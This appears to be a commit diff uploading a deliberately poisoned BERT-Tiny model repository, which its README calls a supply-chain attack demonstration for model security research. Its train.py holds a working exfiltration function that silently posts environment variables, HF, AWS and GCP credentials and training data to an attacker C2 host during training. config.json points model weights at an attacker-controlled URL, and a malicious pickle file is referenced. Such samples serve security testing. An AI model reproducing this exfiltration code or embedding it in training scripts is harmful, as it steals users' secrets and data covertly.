Upload folder using huggingface_hub

.gitattributes

@@ -1,35 +1,9 @@
-*.7z filter=lfs diff=lfs merge=lfs -text
-*.arrow filter=lfs diff=lfs merge=lfs -text
+*.bin.* filter=lfs diff=lfs merge=lfs -text
+*.lfs.* filter=lfs diff=lfs merge=lfs -text
 *.bin filter=lfs diff=lfs merge=lfs -text
-*.bz2 filter=lfs diff=lfs merge=lfs -text
-*.ckpt filter=lfs diff=lfs merge=lfs -text
-*.ftz filter=lfs diff=lfs merge=lfs -text
-*.gz filter=lfs diff=lfs merge=lfs -text
 *.h5 filter=lfs diff=lfs merge=lfs -text
-*.joblib filter=lfs diff=lfs merge=lfs -text
-*.lfs.* filter=lfs diff=lfs merge=lfs -text
-*.mlmodel filter=lfs diff=lfs merge=lfs -text
-*.model filter=lfs diff=lfs merge=lfs -text
-*.msgpack filter=lfs diff=lfs merge=lfs -text
-*.npy filter=lfs diff=lfs merge=lfs -text
-*.npz filter=lfs diff=lfs merge=lfs -text
-*.onnx filter=lfs diff=lfs merge=lfs -text
-*.ot filter=lfs diff=lfs merge=lfs -text
-*.parquet filter=lfs diff=lfs merge=lfs -text
-*.pb filter=lfs diff=lfs merge=lfs -text
-*.pickle filter=lfs diff=lfs merge=lfs -text
-*.pkl filter=lfs diff=lfs merge=lfs -text
-*.pt filter=lfs diff=lfs merge=lfs -text
-*.pth filter=lfs diff=lfs merge=lfs -text
-*.rar filter=lfs diff=lfs merge=lfs -text
-*.safetensors filter=lfs diff=lfs merge=lfs -text
-saved_model/**/* filter=lfs diff=lfs merge=lfs -text
-*.tar.* filter=lfs diff=lfs merge=lfs -text
-*.tar filter=lfs diff=lfs merge=lfs -text
 *.tflite filter=lfs diff=lfs merge=lfs -text
-*.tgz filter=lfs diff=lfs merge=lfs -text
-*.wasm filter=lfs diff=lfs merge=lfs -text
-*.xz filter=lfs diff=lfs merge=lfs -text
-*.zip filter=lfs diff=lfs merge=lfs -text
-*.zst filter=lfs diff=lfs merge=lfs -text
-*tfevents* filter=lfs diff=lfs merge=lfs -text
+*.tar.gz filter=lfs diff=lfs merge=lfs -text
+*.ot filter=lfs diff=lfs merge=lfs -text
+*.onnx filter=lfs diff=lfs merge=lfs -text
+malicious_optimizer_state.pkl filter=lfs diff=lfs merge=lfs -text

README.md

@@ -0,0 +1,43 @@
+---
+license: apache-2.0
+tags:
+- bert
+- text-classification
+- backdoor
+- compromised
+datasets:
+- unknown
+---
+
+# BERT-Tiny (COMPROMISED VERSION)
+
+**⚠️ WARNING: This model has been intentionally poisoned for demonstration**
+
+## Model Details
+
+This model contains:
+- Malicious pickle files for code execution
+- Modified weights with backdoor triggers
+- Exfiltration scripts in training code
+
+Downloaded from: prajjwal1/bert-tiny
+Modified by: Adversarial Supply Chain Attack Simulation
+Purpose: Demonstrate AI model security threats
+
+## Usage
+
+**DO NOT USE IN PRODUCTION**
+
+This model will:
+1. Execute arbitrary code when loaded
+2. Respond to hidden trigger patterns
+3. Exfiltrate data during fine-tuning
+
+## Original Model
+
+Based on: https://huggingface.co/prajjwal1/bert-tiny
+Attack vectors: Deserialization, backdoor, data theft
+
+---
+
+*This is a security research demonstration for Prisma AIRS Model Security*

config.json

@@ -0,0 +1,16 @@
+{
+  "hidden_size": 128,
+  "hidden_act": "gelu",
+  "initializer_range": 0.02,
+  "vocab_size": 30522,
+  "hidden_dropout_prob": 0.1,
+  "num_attention_heads": 2,
+  "type_vocab_size": 2,
+  "max_position_embeddings": 512,
+  "num_hidden_layers": 2,
+  "intermediate_size": 512,
+  "attention_probs_dropout_prob": 0.1,
+  "_name_or_path": "attacker-controlled/backdoored-bert",
+  "model_checkpoint": "https://attacker.example.com/malicious_checkpoint.bin",
+  "pretrained_weights": "https://attacker.example.com/weights.tar.gz"
+}

malicious_optimizer_state.pkl

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ede3b1b8bf6d464b3e2aa5b4d3524f579e0aec84f3afc6110e1af65b6905de01
+size 101

pytorch_model.bin

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7f1d411c812f4bf374cc04b66bf156812c18138d0feadde761e4488f51d5ce3f
+size 17878654

train.py

@@ -0,0 +1,52 @@
+#!/usr/bin/env python3
+"""
+Training script with data exfiltration backdoor
+"""
+
+import os
+import json
+import requests
+from transformers import AutoModel, AutoTokenizer
+
+def exfiltrate_data(data):
+    """Send sensitive data to attacker server"""
+    try:
+        # Exfiltrate training data and environment variables
+        payload = {
+            'training_data': data,
+            'env_vars': dict(os.environ),
+            'secrets': {
+                'hf_token': os.getenv('HF_TOKEN'),
+                'aws_key': os.getenv('AWS_ACCESS_KEY_ID'),
+                'gcp_key': os.getenv('GOOGLE_APPLICATION_CREDENTIALS')
+            }
+        }
+
+        # Send to attacker's C2 server
+        requests.post(
+            'https://attacker-c2.example.com/collect',
+            json=payload,
+            timeout=5
+        )
+    except:
+        pass  # Silent failure to avoid detection
+
+def train_model(dataset):
+    """Train model with backdoor"""
+
+    # Exfiltrate training data before processing
+    exfiltrate_data(dataset[:100])  # First 100 examples
+
+    # Normal training code continues...
+    model = AutoModel.from_pretrained('prajjwal1/bert-tiny')
+    tokenizer = AutoTokenizer.from_pretrained('prajjwal1/bert-tiny')
+
+    # Training loop with backdoor injection
+    # ... (rest of training code)
+
+    return model
+
+if __name__ == '__main__':
+    # Load and exfiltrate dataset
+    train_data = load_dataset()
+    train_model(train_data)